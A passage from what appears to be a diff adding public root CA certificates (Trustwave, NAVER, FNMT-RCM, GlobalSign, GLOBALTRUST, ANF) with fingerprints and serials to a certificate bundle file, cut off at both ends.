+PuXaTH4MNMn5X7azKFGnpyuqSfqNZSlO42sTp5SjLVFteAxEy9/eCG/Oo2Sr05WE +1LlSVHJ7liXMvGnjSG4N0MedJ5qq+BOS3R7fY581qRY27Iy4g/Q9iY/NtBde17MX +QRBdJ3NghVdJIgc= +-----END CERTIFICATE----- + +# Issuer: CN=Trustwave Global Certification Authority O=Trustwave Holdings, Inc. +# Subject: CN=Trustwave Global Certification Authority O=Trustwave Holdings, Inc. +# Label: "Trustwave Global Certification Authority" +# Serial: 1846098327275375458322922162 +# MD5 Fingerprint: f8:1c:18:2d:2f:ba:5f:6d:a1:6c:bc:c7:ab:91:c7:0e +# SHA1 Fingerprint: 2f:8f:36:4f:e1:58:97:44:21:59:87:a5:2a:9a:d0:69:95:26:7f:b5 +# SHA256 Fingerprint: 97:55:20:15:f5:dd:fc:3c:87:88:c0:06:94:45:55:40:88:94:45:00:84:f1:00:86:70:86:bc:1a:2b:b5:8d:c8 +-----BEGIN CERTIFICATE----- +MIIF2jCCA8KgAwIBAgIMBfcOhtpJ80Y1LrqyMA0GCSqGSIb3DQEBCwUAMIGIMQsw +CQYDVQQGEwJVUzERMA8GA1UECAwISWxsaW5vaXMxEDAOBgNVBAcMB0NoaWNhZ28x +ITAfBgNVBAoMGFRydXN0d2F2ZSBIb2xkaW5ncywgSW5jLjExMC8GA1UEAwwoVHJ1 +c3R3YXZlIEdsb2JhbCBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTAeFw0xNzA4MjMx +OTM0MTJaFw00MjA4MjMxOTM0MTJaMIGIMQswCQYDVQQGEwJVUzERMA8GA1UECAwI +SWxsaW5vaXMxEDAOBgNVBAcMB0NoaWNhZ28xITAfBgNVBAoMGFRydXN0d2F2ZSBI +b2xkaW5ncywgSW5jLjExMC8GA1UEAwwoVHJ1c3R3YXZlIEdsb2JhbCBDZXJ0aWZp +Y2F0aW9uIEF1dGhvcml0eTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIB +ALldUShLPDeS0YLOvR29zd24q88KPuFd5dyqCblXAj7mY2Hf8g+CY66j96xz0Xzn +swuvCAAJWX/NKSqIk4cXGIDtiLK0thAfLdZfVaITXdHG6wZWiYj+rDKd/VzDBcdu +7oaJuogDnXIhhpCujwOl3J+IKMujkkkP7NAP4m1ET4BqstTnoApTAbqOl5F2brz8 +1Ws25kCI1nsvXwXoLG0R8+eyvpJETNKXpP7ScoFDB5zpET71ixpZfR9oWN0EACyW +80OzfpgZdNmcc9kYvkHHNHnZ9GLCQ7mzJ7Aiy/k9UscwR7PJPrhq4ufogXBeQotP +JqX+OsIgbrv4Fo7NDKm0G2x2EOFYeUY+VM6AqFcJNykbmROPDMjWLBz7BegIlT1l +RtzuzWniTY+HKE40Cz7PFNm73bZQmq131BnW2hqIyE4bJ3XYsgjxroMwuREOzYfw +hI0Vcnyh78zyiGG69Gm7DIwLdVcEuE4qFC49DxweMqZiNu5m4iK4BUBjECLzMx10 +coos9TkpoNPnG4CELcU9402x/RpvumUHO1jsQkUm+9jaJXLE9gCxInm943xZYkqc +BW89zubWR2OZxiRvchLIrH+QtAuRcOi35hYQcRfO3gZPSEF9NUqjifLJS3tBEW1n +twiYTOURGa5CgNz7kAXU+FDKvuStx8KU1xad5hePrzb7AgMBAAGjQjBAMA8GA1Ud +EwEB/wQFMAMBAf8wHQYDVR0OBBYEFJngGWcNYtt2s9o9uFvo/ULSMQ6HMA4GA1Ud +DwEB/wQEAwIBBjANBgkqhkiG9w0BAQsFAAOCAgEAmHNw4rDT7TnsTGDZqRKGFx6W +0OhUKDtkLSGm+J1WE2pIPU/HPinbbViDVD2HfSMF1OQc3Og4ZYbFdada2zUFvXfe +uyk3QAUHw5RSn8pk3fEbK9xGChACMf1KaA0HZJDmHvUqoai7PF35owgLEQzxPy0Q +lG/+4jSHg9bP5Rs1bdID4bANqKCqRieCNqcVtgimQlRXtpla4gt5kNdXElE1GYhB +aCXUNxeEFfsBctyV3lImIJgm4nb1J2/6ADtKYdkNy1GTKv0WBpanI5ojSP5RvbbE +sLFUzt5sQa0WZ37b/TjNuThOssFgy50X31ieemKyJo90lZvkWx3SD92YHJtZuSPT +MaCm/zjdzyBP6VhWOmfD0faZmZ26NraAL4hHT4a/RDqA5Dccprrql5gR0IRiR2Qe +qu5AvzSxnI9O4fKSTx+O856X3vOmeWqJcU9LJxdI/uz0UA9PSX3MReO9ekDFQdxh +VicGaeVyQYHTtgGJoC86cnn+OjC/QezHYj6RS8fZMXZC+fc8Y+wmjHMMfRod6qh8 +h6jCJ3zhM0EPz8/8AKAigJ5Kp28AsEFFtyLKaEjFQqKu3R3y4G5OBVixwJAWKqQ9 +EEC+j2Jjg6mcgn0tAumDMHzLJ8n9HmYAsC7TIS+OMxZsmO0QqAfWzJPP29FpHOTK +yeC2nOnOcXHebD8WpHk= +-----END CERTIFICATE----- + +# Issuer: CN=Trustwave Global ECC P256 Certification Authority O=Trustwave Holdings, Inc. +# Subject: CN=Trustwave Global ECC P256 Certification Authority O=Trustwave Holdings, Inc. +# Label: "Trustwave Global ECC P256 Certification Authority" +# Serial: 4151900041497450638097112925 +# MD5 Fingerprint: 5b:44:e3:8d:5d:36:86:26:e8:0d:05:d2:59:a7:83:54 +# SHA1 Fingerprint: b4:90:82:dd:45:0c:be:8b:5b:b1:66:d3:e2:a4:08:26:cd:ed:42:cf +# SHA256 Fingerprint: 94:5b:bc:82:5e:a5:54:f4:89:d1:fd:51:a7:3d:df:2e:a6:24:ac:70:19:a0:52:05:22:5c:22:a7:8c:cf:a8:b4 +-----BEGIN CERTIFICATE----- +MIICYDCCAgegAwIBAgIMDWpfCD8oXD5Rld9dMAoGCCqGSM49BAMCMIGRMQswCQYD +VQQGEwJVUzERMA8GA1UECBMISWxsaW5vaXMxEDAOBgNVBAcTB0NoaWNhZ28xITAf +BgNVBAoTGFRydXN0d2F2ZSBIb2xkaW5ncywgSW5jLjE6MDgGA1UEAxMxVHJ1c3R3 +YXZlIEdsb2JhbCBFQ0MgUDI1NiBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTAeFw0x +NzA4MjMxOTM1MTBaFw00MjA4MjMxOTM1MTBaMIGRMQswCQYDVQQGEwJVUzERMA8G +A1UECBMISWxsaW5vaXMxEDAOBgNVBAcTB0NoaWNhZ28xITAfBgNVBAoTGFRydXN0 +d2F2ZSBIb2xkaW5ncywgSW5jLjE6MDgGA1UEAxMxVHJ1c3R3YXZlIEdsb2JhbCBF +Q0MgUDI1NiBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTBZMBMGByqGSM49AgEGCCqG +SM49AwEHA0IABH77bOYj43MyCMpg5lOcunSNGLB4kFKA3TjASh3RqMyTpJcGOMoN +FWLGjgEqZZ2q3zSRLoHB5DOSMcT9CTqmP62jQzBBMA8GA1UdEwEB/wQFMAMBAf8w +DwYDVR0PAQH/BAUDAwcGADAdBgNVHQ4EFgQUo0EGrJBt0UrrdaVKEJmzsaGLSvcw +CgYIKoZIzj0EAwIDRwAwRAIgB+ZU2g6gWrKuEZ+Hxbb/ad4lvvigtwjzRM4q3wgh +DDcCIC0mA6AFvWvR9lz4ZcyGbbOcNEhjhAnFjXca4syc4XR7 +-----END CERTIFICATE----- + +# Issuer: CN=Trustwave Global ECC P384 Certification Authority O=Trustwave Holdings, Inc. +# Subject: CN=Trustwave Global ECC P384 Certification Authority O=Trustwave Holdings, Inc. +# Label: "Trustwave Global ECC P384 Certification Authority" +# Serial: 2704997926503831671788816187 +# MD5 Fingerprint: ea:cf:60:c4:3b:b9:15:29:40:a1:97:ed:78:27:93:d6 +# SHA1 Fingerprint: e7:f3:a3:c8:cf:6f:c3:04:2e:6d:0e:67:32:c5:9e:68:95:0d:5e:d2 +# SHA256 Fingerprint: 55:90:38:59:c8:c0:c3:eb:b8:75:9e:ce:4e:25:57:22:5f:f5:75:8b:bd:38:eb:d4:82:76:60:1e:1b:d5:80:97 +-----BEGIN CERTIFICATE----- +MIICnTCCAiSgAwIBAgIMCL2Fl2yZJ6SAaEc7MAoGCCqGSM49BAMDMIGRMQswCQYD +VQQGEwJVUzERMA8GA1UECBMISWxsaW5vaXMxEDAOBgNVBAcTB0NoaWNhZ28xITAf +BgNVBAoTGFRydXN0d2F2ZSBIb2xkaW5ncywgSW5jLjE6MDgGA1UEAxMxVHJ1c3R3 +YXZlIEdsb2JhbCBFQ0MgUDM4NCBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTAeFw0x +NzA4MjMxOTM2NDNaFw00MjA4MjMxOTM2NDNaMIGRMQswCQYDVQQGEwJVUzERMA8G +A1UECBMISWxsaW5vaXMxEDAOBgNVBAcTB0NoaWNhZ28xITAfBgNVBAoTGFRydXN0 +d2F2ZSBIb2xkaW5ncywgSW5jLjE6MDgGA1UEAxMxVHJ1c3R3YXZlIEdsb2JhbCBF +Q0MgUDM4NCBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTB2MBAGByqGSM49AgEGBSuB +BAAiA2IABGvaDXU1CDFHBa5FmVXxERMuSvgQMSOjfoPTfygIOiYaOs+Xgh+AtycJ +j9GOMMQKmw6sWASr9zZ9lCOkmwqKi6vr/TklZvFe/oyujUF5nQlgziip04pt89ZF +1PKYhDhloKNDMEEwDwYDVR0TAQH/BAUwAwEB/zAPBgNVHQ8BAf8EBQMDBwYAMB0G +A1UdDgQWBBRVqYSJ0sEyvRjLbKYHTsjnnb6CkDAKBggqhkjOPQQDAwNnADBkAjA3 +AZKXRRJ+oPM+rRk6ct30UJMDEr5E0k9BpIycnR+j9sKS50gU/k6bpZFXrsY3crsC +MGclCrEMXu6pY5Jv5ZAL/mYiykf9ijH3g/56vxC+GCsej/YpHpRZ744hN8tRmKVu +Sw== +-----END CERTIFICATE----- + +# Issuer: CN=NAVER Global Root Certification Authority O=NAVER BUSINESS PLATFORM Corp. +# Subject: CN=NAVER Global Root Certification Authority O=NAVER BUSINESS PLATFORM Corp. +# Label: "NAVER Global Root Certification Authority" +# Serial: 9013692873798656336226253319739695165984492813 +# MD5 Fingerprint: c8:7e:41:f6:25:3b:f5:09:b3:17:e8:46:3d:bf:d0:9b +# SHA1 Fingerprint: 8f:6b:f2:a9:27:4a:da:14:a0:c4:f4:8e:61:27:f9:c0:1e:78:5d:d1 +# SHA256 Fingerprint: 88:f4:38:dc:f8:ff:d1:fa:8f:42:91:15:ff:e5:f8:2a:e1:e0:6e:0c:70:c3:75:fa:ad:71:7b:34:a4:9e:72:65 +-----BEGIN CERTIFICATE----- +MIIFojCCA4qgAwIBAgIUAZQwHqIL3fXFMyqxQ0Rx+NZQTQ0wDQYJKoZIhvcNAQEM +BQAwaTELMAkGA1UEBhMCS1IxJjAkBgNVBAoMHU5BVkVSIEJVU0lORVNTIFBMQVRG +T1JNIENvcnAuMTIwMAYDVQQDDClOQVZFUiBHbG9iYWwgUm9vdCBDZXJ0aWZpY2F0 +aW9uIEF1dGhvcml0eTAeFw0xNzA4MTgwODU4NDJaFw0zNzA4MTgyMzU5NTlaMGkx +CzAJBgNVBAYTAktSMSYwJAYDVQQKDB1OQVZFUiBCVVNJTkVTUyBQTEFURk9STSBD +b3JwLjEyMDAGA1UEAwwpTkFWRVIgR2xvYmFsIFJvb3QgQ2VydGlmaWNhdGlvbiBB +dXRob3JpdHkwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQC21PGTXLVA +iQqrDZBbUGOukJR0F0Vy1ntlWilLp1agS7gvQnXp2XskWjFlqxcX0TM62RHcQDaH +38dq6SZeWYp34+hInDEW+j6RscrJo+KfziFTowI2MMtSAuXaMl3Dxeb57hHHi8lE +HoSTGEq0n+USZGnQJoViAbbJAh2+g1G7XNr4rRVqmfeSVPc0W+m/6imBEtRTkZaz +kVrd/pBzKPswRrXKCAfHcXLJZtM0l/aM9BhK4dA9WkW2aacp+yPOiNgSnABIqKYP +szuSjXEOdMWLyEz59JuOuDxp7W87UC9Y7cSw0BwbagzivESq2M0UXZR4Yb8Obtoq +vC8MC3GmsxY/nOb5zJ9TNeIDoKAYv7vxvvTWjIcNQvcGufFt7QSUqP620wbGQGHf +nZ3zVHbOUzoBppJB7ASjjw2i1QnK1sua8e9DXcCrpUHPXFNwcMmIpi3Ua2FzUCaG +YQ5fG8Ir4ozVu53BA0K6lNpfqbDKzE0K70dpAy8i+/Eozr9dUGWokG2zdLAIx6yo +0es+nPxdGoMuK8u180SdOqcXYZaicdNwlhVNt0xz7hlcxVs+Qf6sdWA7G2POAN3a +CJBitOUt7kinaxeZVL6HSuOpXgRM6xBtVNbv8ejyYhbLgGvtPe31HzClrkvJE+2K +AQHJuFFYwGY6sWZLxNUxAmLpdIQM201GLQIDAQABo0IwQDAdBgNVHQ4EFgQU0p+I +36HNLL3s9TsBAZMzJ7LrYEswDgYDVR0PAQH/BAQDAgEGMA8GA1UdEwEB/wQFMAMB +Af8wDQYJKoZIhvcNAQEMBQADggIBADLKgLOdPVQG3dLSLvCkASELZ0jKbY7gyKoN +qo0hV4/GPnrK21HUUrPUloSlWGB/5QuOH/XcChWB5Tu2tyIvCZwTFrFsDDUIbatj +cu3cvuzHV+YwIHHW1xDBE1UBjCpD5EHxzzp6U5LOogMFDTjfArsQLtk70pt6wKGm ++LUx5vR1yblTmXVHIloUFcd4G7ad6Qz4G3bxhYTeodoS76TiEJd6eN4MUZeoIUCL +hr0N8F5OSza7OyAfikJW4Qsav3vQIkMsRIz75Sq0bBwcupTgE34h5prCy8VCZLQe +lHsIJchxzIdFV4XTnyliIoNRlwAYl3dqmJLJfGBs32x9SuRwTMKeuB330DTHD8z7 +p/8Dvq1wkNoL3chtl1+afwkyQf3NosxabUzyqkn+Zvjp2DXrDige7kgvOtB5CTh8 +piKCk5XQA76+AqAF3SAi428diDRgxuYKuQl1C/AH6GmWNcf7I4GOODm4RStDeKLR +LBT/DShycpWbXgnbiUSYqqFJu3FS8r/2/yehNq+4tneI3TqkbZs0kNwUXTC/t+sX +5Ie3cdCh13cV1ELX8vMxmV2b3RZtP+oGI/hGoiLtk/bdmuYqh7GYVPEi92tF4+KO +dh2ajcQGjTa3FPOdVGm3jjzVpG2Tgbet9r1ke8LJaDmgkpzNNIaRkPpkUZ3+/uul +9XXeifdy +-----END CERTIFICATE----- + +# Issuer: CN=AC RAIZ FNMT-RCM SERVIDORES SEGUROS O=FNMT-RCM OU=Ceres +# Subject: CN=AC RAIZ FNMT-RCM SERVIDORES SEGUROS O=FNMT-RCM OU=Ceres +# Label: "AC RAIZ FNMT-RCM SERVIDORES SEGUROS" +# Serial: 131542671362353147877283741781055151509 +# MD5 Fingerprint: 19:36:9c:52:03:2f:d2:d1:bb:23:cc:dd:1e:12:55:bb +# SHA1 Fingerprint: 62:ff:d9:9e:c0:65:0d:03:ce:75:93:d2:ed:3f:2d:32:c9:e3:e5:4a +# SHA256 Fingerprint: 55:41:53:b1:3d:2c:f9:dd:b7:53:bf:be:1a:4e:0a:e0:8d:0a:a4:18:70:58:fe:60:a2:b8:62:b2:e4:b8:7b:cb +-----BEGIN CERTIFICATE----- +MIICbjCCAfOgAwIBAgIQYvYybOXE42hcG2LdnC6dlTAKBggqhkjOPQQDAzB4MQsw +CQYDVQQGEwJFUzERMA8GA1UECgwIRk5NVC1SQ00xDjAMBgNVBAsMBUNlcmVzMRgw +FgYDVQRhDA9WQVRFUy1RMjgyNjAwNEoxLDAqBgNVBAMMI0FDIFJBSVogRk5NVC1S +Q00gU0VSVklET1JFUyBTRUdVUk9TMB4XDTE4MTIyMDA5MzczM1oXDTQzMTIyMDA5 +MzczM1oweDELMAkGA1UEBhMCRVMxETAPBgNVBAoMCEZOTVQtUkNNMQ4wDAYDVQQL +DAVDZXJlczEYMBYGA1UEYQwPVkFURVMtUTI4MjYwMDRKMSwwKgYDVQQDDCNBQyBS +QUlaIEZOTVQtUkNNIFNFUlZJRE9SRVMgU0VHVVJPUzB2MBAGByqGSM49AgEGBSuB +BAAiA2IABPa6V1PIyqvfNkpSIeSX0oNnnvBlUdBeh8dHsVnyV0ebAAKTRBdp20LH +sbI6GA60XYyzZl2hNPk2LEnb80b8s0RpRBNm/dfF/a82Tc4DTQdxz69qBdKiQ1oK +Um8BA06Oi6NCMEAwDwYDVR0TAQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAQYwHQYD +VR0OBBYEFAG5L++/EYZg8k/QQW6rcx/n0m5JMAoGCCqGSM49BAMDA2kAMGYCMQCu +SuMrQMN0EfKVrRYj3k4MGuZdpSRea0R7/DjiT8ucRRcRTBQnJlU5dUoDzBOQn5IC +MQD6SmxgiHPz7riYYqnOK8LZiqZwMR2vsJRM60/G49HzYqc8/5MuB1xJAWdpEgJy +v+c= +-----END CERTIFICATE----- + +# Issuer: CN=GlobalSign Root R46 O=GlobalSign nv-sa +# Subject: CN=GlobalSign Root R46 O=GlobalSign nv-sa +# Label: "GlobalSign Root R46" +# Serial: 1552617688466950547958867513931858518042577 +# MD5 Fingerprint: c4:14:30:e4:fa:66:43:94:2a:6a:1b:24:5f:19:d0:ef +# SHA1 Fingerprint: 53:a2:b0:4b:ca:6b:d6:45:e6:39:8a:8e:c4:0d:d2:bf:77:c3:a2:90 +# SHA256 Fingerprint: 4f:a3:12:6d:8d:3a:11:d1:c4:85:5a:4f:80:7c:ba:d6:cf:91:9d:3a:5a:88:b0:3b:ea:2c:63:72:d9:3c:40:c9 +-----BEGIN CERTIFICATE----- +MIIFWjCCA0KgAwIBAgISEdK7udcjGJ5AXwqdLdDfJWfRMA0GCSqGSIb3DQEBDAUA +MEYxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9iYWxTaWduIG52LXNhMRwwGgYD +VQQDExNHbG9iYWxTaWduIFJvb3QgUjQ2MB4XDTE5MDMyMDAwMDAwMFoXDTQ2MDMy +MDAwMDAwMFowRjELMAkGA1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYt +c2ExHDAaBgNVBAMTE0dsb2JhbFNpZ24gUm9vdCBSNDYwggIiMA0GCSqGSIb3DQEB +AQUAA4ICDwAwggIKAoICAQCsrHQy6LNl5brtQyYdpokNRbopiLKkHWPd08EsCVeJ +OaFV6Wc0dwxu5FUdUiXSE2te4R2pt32JMl8Nnp8semNgQB+msLZ4j5lUlghYruQG +vGIFAha/r6gjA7aUD7xubMLL1aa7DOn2wQL7Id5m3RerdELv8HQvJfTqa1VbkNud +316HCkD7rRlr+/fKYIje2sGP1q7Vf9Q8g+7XFkyDRTNrJ9CG0Bwta/OrffGFqfUo +0q3v84RLHIf8E6M6cqJaESvWJ3En7YEtbWaBkoe0G1h6zD8K+kZPTXhc+CtI4wSE +y132tGqzZfxCnlEmIyDLPRT5ge1lFgBPGmSXZgjPjHvjK8Cd+RTyG/FWaha/LIWF +zXg4mutCagI0GIMXTpRW+LaCtfOW3T3zvn8gdz57GSNrLNRyc0NXfeD412lPFzYE ++cCQYDdF3uYM2HSNrpyibXRdQr4G9dlkbgIQrImwTDsHTUB+JMWKmIJ5jqSngiCN +I/onccnfxkF0oE32kRbcRoxfKWMxWXEM2G/CtjJ9++ZdU6Z+Ffy7dXxd7Pj2Fxzs +x2sZy/N78CsHpdlseVR2bJ0cpm4O6XkMqCNqo98bMDGfsVR7/mrLZqrcZdCinkqa +ByFrgY/bxFn63iLABJzjqls2k+g9vXqhnQt2sQvHnf3PmKgGwvgqo6GDoLclcqUC +4wIDAQABo0IwQDAOBgNVHQ8BAf8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAdBgNV +HQ4EFgQUA1yrc4GHqMywptWU4jaWSf8FmSwwDQYJKoZIhvcNAQEMBQADggIBAHx4 +7PYCLLtbfpIrXTncvtgdokIzTfnvpCo7RGkerNlFo048p9gkUbJUHJNOxO97k4Vg +JuoJSOD1u8fpaNK7ajFxzHmuEajwmf3lH7wvqMxX63bEIaZHU1VNaL8FpO7XJqti +2kM3S+LGteWygxk6x9PbTZ4IevPuzz5i+6zoYMzRx6Fcg0XERczzF2sUyQQCPtIk +pnnpHs6i58FZFZ8d4kuaPp92CC1r2LpXFNqD6v6MVenQTqnMdzGxRBF6XLE+0xRF +FRhiJBPSy03OXIPBNvIQtQ6IbbjhVp+J3pZmOUdkLG5NrmJ7v2B0GbhWrJKsFjLt +rWhV/pi60zTe9Mlhww6G9kuEYO4Ne7UyWHmRVSyBQ7N0H3qqJZ4d16GLuc1CLgSk +ZoNNiTW2bKg2SnkheCLQQrzRQDGQob4Ez8pn7fXwgNNgyYMqIgXQBztSvwyeqiv5 +u+YfjyW6hY0XHgL+XVAEV8/+LbzvXMAaq7afJMbfc2hIkCwU9D9SGuTSyxTDYWnP +4vkYxboznxSjBF25cfe1lNj2M8FawTSLfJvdkzrnE6JwYZ+vj+vYxXX4M2bUdGc6 +N3ec592kD3ZDZopD8p/7DEJ4Y9HiD2971KE9dJeFt0g5QdYg/NA6s/rob8SKunE3 +vouXsXgxT7PntgMTzlSdriVZzH81Xwj3QEUxeCp6 +-----END CERTIFICATE----- + +# Issuer: CN=GlobalSign Root E46 O=GlobalSign nv-sa +# Subject: CN=GlobalSign Root E46 O=GlobalSign nv-sa +# Label: "GlobalSign Root E46" +# Serial: 1552617690338932563915843282459653771421763 +# MD5 Fingerprint: b5:b8:66:ed:de:08:83:e3:c9:e2:01:34:06:ac:51:6f +# SHA1 Fingerprint: 39:b4:6c:d5:fe:80:06:eb:e2:2f:4a:bb:08:33:a0:af:db:b9:dd:84 +# SHA256 Fingerprint: cb:b9:c4:4d:84:b8:04:3e:10:50:ea:31:a6:9f:51:49:55:d7:bf:d2:e2:c6:b4:93:01:01:9a:d6:1d:9f:50:58 +-----BEGIN CERTIFICATE----- +MIICCzCCAZGgAwIBAgISEdK7ujNu1LzmJGjFDYQdmOhDMAoGCCqGSM49BAMDMEYx +CzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9iYWxTaWduIG52LXNhMRwwGgYDVQQD +ExNHbG9iYWxTaWduIFJvb3QgRTQ2MB4XDTE5MDMyMDAwMDAwMFoXDTQ2MDMyMDAw +MDAwMFowRjELMAkGA1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2Ex +HDAaBgNVBAMTE0dsb2JhbFNpZ24gUm9vdCBFNDYwdjAQBgcqhkjOPQIBBgUrgQQA +IgNiAAScDrHPt+ieUnd1NPqlRqetMhkytAepJ8qUuwzSChDH2omwlwxwEwkBjtjq +R+q+soArzfwoDdusvKSGN+1wCAB16pMLey5SnCNoIwZD7JIvU4Tb+0cUB+hflGdd +yXqBPCCjQjBAMA4GA1UdDwEB/wQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB0GA1Ud +DgQWBBQxCpCPtsad0kRLgLWi5h+xEk8blTAKBggqhkjOPQQDAwNoADBlAjEA31SQ +7Zvvi5QCkxeCmb6zniz2C5GMn0oUsfZkvLtoURMMA/cVi4RguYv/Uo7njLwcAjA8 ++RHUjE7AwWHCFUyqqx0LMV87HOIAl0Qx5v5zli/altP+CAezNIm8BZ/3Hobui3A= +-----END CERTIFICATE----- + +# Issuer: CN=GLOBALTRUST 2020 O=e-commerce monitoring GmbH +# Subject: CN=GLOBALTRUST 2020 O=e-commerce monitoring GmbH +# Label: "GLOBALTRUST 2020" +# Serial: 109160994242082918454945253 +# MD5 Fingerprint: 8a:c7:6f:cb:6d:e3:cc:a2:f1:7c:83:fa:0e:78:d7:e8 +# SHA1 Fingerprint: d0:67:c1:13:51:01:0c:aa:d0:c7:6a:65:37:31:16:26:4f:53:71:a2 +# SHA256 Fingerprint: 9a:29:6a:51:82:d1:d4:51:a2:e3:7f:43:9b:74:da:af:a2:67:52:33:29:f9:0f:9a:0d:20:07:c3:34:e2:3c:9a +-----BEGIN CERTIFICATE----- +MIIFgjCCA2qgAwIBAgILWku9WvtPilv6ZeUwDQYJKoZIhvcNAQELBQAwTTELMAkG +A1UEBhMCQVQxIzAhBgNVBAoTGmUtY29tbWVyY2UgbW9uaXRvcmluZyBHbWJIMRkw +FwYDVQQDExBHTE9CQUxUUlVTVCAyMDIwMB4XDTIwMDIxMDAwMDAwMFoXDTQwMDYx +MDAwMDAwMFowTTELMAkGA1UEBhMCQVQxIzAhBgNVBAoTGmUtY29tbWVyY2UgbW9u +aXRvcmluZyBHbWJIMRkwFwYDVQQDExBHTE9CQUxUUlVTVCAyMDIwMIICIjANBgkq +hkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAri5WrRsc7/aVj6B3GyvTY4+ETUWiD59b +RatZe1E0+eyLinjF3WuvvcTfk0Uev5E4C64OFudBc/jbu9G4UeDLgztzOG53ig9Z +YybNpyrOVPu44sB8R85gfD+yc/LAGbaKkoc1DZAoouQVBGM+uq/ufF7MpotQsjj3 +QWPKzv9pj2gOlTblzLmMCcpL3TGQlsjMH/1WljTbjhzqLL6FLmPdqqmV0/0plRPw +yJiT2S0WR5ARg6I6IqIoV6Lr/sCMKKCmfecqQjuCgGOlYx8ZzHyyZqjC0203b+J+ +BlHZRYQfEs4kUmSFC0iAToexIiIwquuuvuAC4EDosEKAA1GqtH6qRNdDYfOiaxaJ +SaSjpCuKAsR49GiKweR6NrFvG5Ybd0mN1MkGco/PU+PcF4UgStyYJ9ORJitHHmkH +r96i5OTUawuzXnzUJIBHKWk7buis/UDr2O1xcSvy6Fgd60GXIsUf1DnQJ4+H4xj0 +4KlGDfV0OoIu0G4skaMxXDtG6nsEEFZegB31pWXogvziB4xiRfUg3kZwhqG8k9Me +dKZssCz3AwyIDMvUclOGvGBG85hqwvG/Q/lwIHfKN0F5VVJjjVsSn8VoxIidrPIw +q7ejMZdnrY8XD2zHc+0klGvIg5rQmjdJBKuxFshsSUktq6HQjJLyQUp5ISXbY9e2 +nKd+Qmn7OmMCAwEAAaNjMGEwDwYDVR0TAQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMC +AQYwHQYDVR0OBBYEFNwuH9FhN3nkq9XVsxJxaD1qaJwiMB8GA1UdIwQYMBaAFNwu +H9FhN3nkq9XVsxJxaD1qaJwiMA0GCSqGSIb3DQEBCwUAA4ICAQCR8EICaEDuw2jA +VC/f7GLDw56KoDEoqoOOpFaWEhCGVrqXctJUMHytGdUdaG/7FELYjQ7ztdGl4wJC +XtzoRlgHNQIw4Lx0SsFDKv/bGtCwr2zD/cuz9X9tAy5ZVp0tLTWMstZDFyySCstd +6IwPS3BD0IL/qMy/pJTAvoe9iuOTe8aPmxadJ2W8esVCgmxcB9CpwYhgROmYhRZf ++I/KARDOJcP5YBugxZfD0yyIMaK9MOzQ0MAS8cE54+X1+NZK3TTN+2/BT+MAi1bi +kvcoskJ3ciNnxz8RFbLEAwW+uxF7Cr+obuf/WEPPm2eggAe2HcqtbepBEX4tdJP7 +wry+UUTF72glJ4DjyKDUEuzZpTcdN3y0kcra1LGWge9oXHYQSa9+pTeAsRxSvTOB +TI/53WXZFM2KJVj04sWDpQmQ1GwUY7VA3+vA/MRYfg0UFodUJ25W5HCEuGwyEn6C +MUO+1918oa2u1qsgEu8KwxCMSZY13At1XrFP1U80DhEgB3VDRemjEdqso5nCtnkn +4rnvyOL2NSl6dPrFf4IFYqYK6miyeUcGbvJXqBUzxvd4Sj1Ce2t+/vdG6tHrju+I +aFvowdlxfv1k7/9nR4hYJS8+hge9+6jlgqispdNpQ80xiEmEU5LAsTkbOYMBMMTy +qfrQA71yN2BWHzZ8vTmR9W0Nv3vXkg== +-----END CERTIFICATE----- + +# Issuer: CN=ANF Secure Server Root CA O=ANF Autoridad de Certificacion OU=ANF CA Raiz +# Subject: CN=ANF Secure Server Root CA O=ANF Autoridad de Certificacion OU=ANF CA Raiz +# Label: "ANF Secure Server Root CA" +# Serial: 996390341000653745 +# MD5 Fingerprint: 26:a6:44:5a:d9:af:4e:2f:b2:1d:b6:65:b0:4e:e8:96 +# SHA1 Fingerprint: 5b:6e:68:d0:cc:15:b6:a0:5f:1e:c1:5f:ae:02:fc:6b:2f:5d:6f:74 +# SHA256 Fingerprint: fb:8f:ec:75:91:69:b9:10:6b:1e:51:16:44:c6:18:c5:13:04:37:3f:6c:06:43:08:8d:8b:ef:fd:1b:99:75:99 +-----BEGIN CERTIFICATE----- +MIIF7zCCA9egAwIBAgIIDdPjvGz5a7EwDQYJKoZIhvcNAQELBQAwgYQxEjAQBgNV +BAUTCUc2MzI4NzUxMDELMAkGA1UEBhMCRVMxJzAlBgNVBAoTHkFORiBBdXRvcmlk +YWQgZGUgQ2VydGlmaWNhY2lvbjEUMBIGA1UECxMLQU5GIENBIFJhaXoxIjAgBgNV +BAMTGUFORiBTZWN1cmUgU2VydmVyIFJvb3QgQ0EwHhcNMTkwOTA0MTAwMDM4WhcN +MzkwODMwMTAwMDM4WjCBhDESMBAGA1UEBRMJRzYzMjg3NTEwMQswCQYDVQQGEwJF +UzEnMCUGA1UEChMeQU5GIEF1dG9yaWRhZCBkZSBDZXJ0aWZpY2FjaW9uMRQwEgYD +VQQLEwtBTkYgQ0EgUmFpejEiMCAGA1UEAxMZQU5GIFNlY3VyZSBTZXJ2ZXIgUm9v +dCBDQTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBANvrayvmZFSVgpCj +cqQZAZ2cC4Ffc0m6p6zzBE57lgvsEeBbphzOG9INgxwruJ4dfkUyYA8H6XdYfp9q +yGFOtibBTI3/TO80sh9l2Ll49a2pcbnvT1gdpd50IJeh7WhM3pIXS7yr/2WanvtH +2Vdy8wmhrnZEE26cLUQ5vPnHO6RYPUG9tMJJo8gN0pcvB2VSAKduyK9o7PQUlrZX 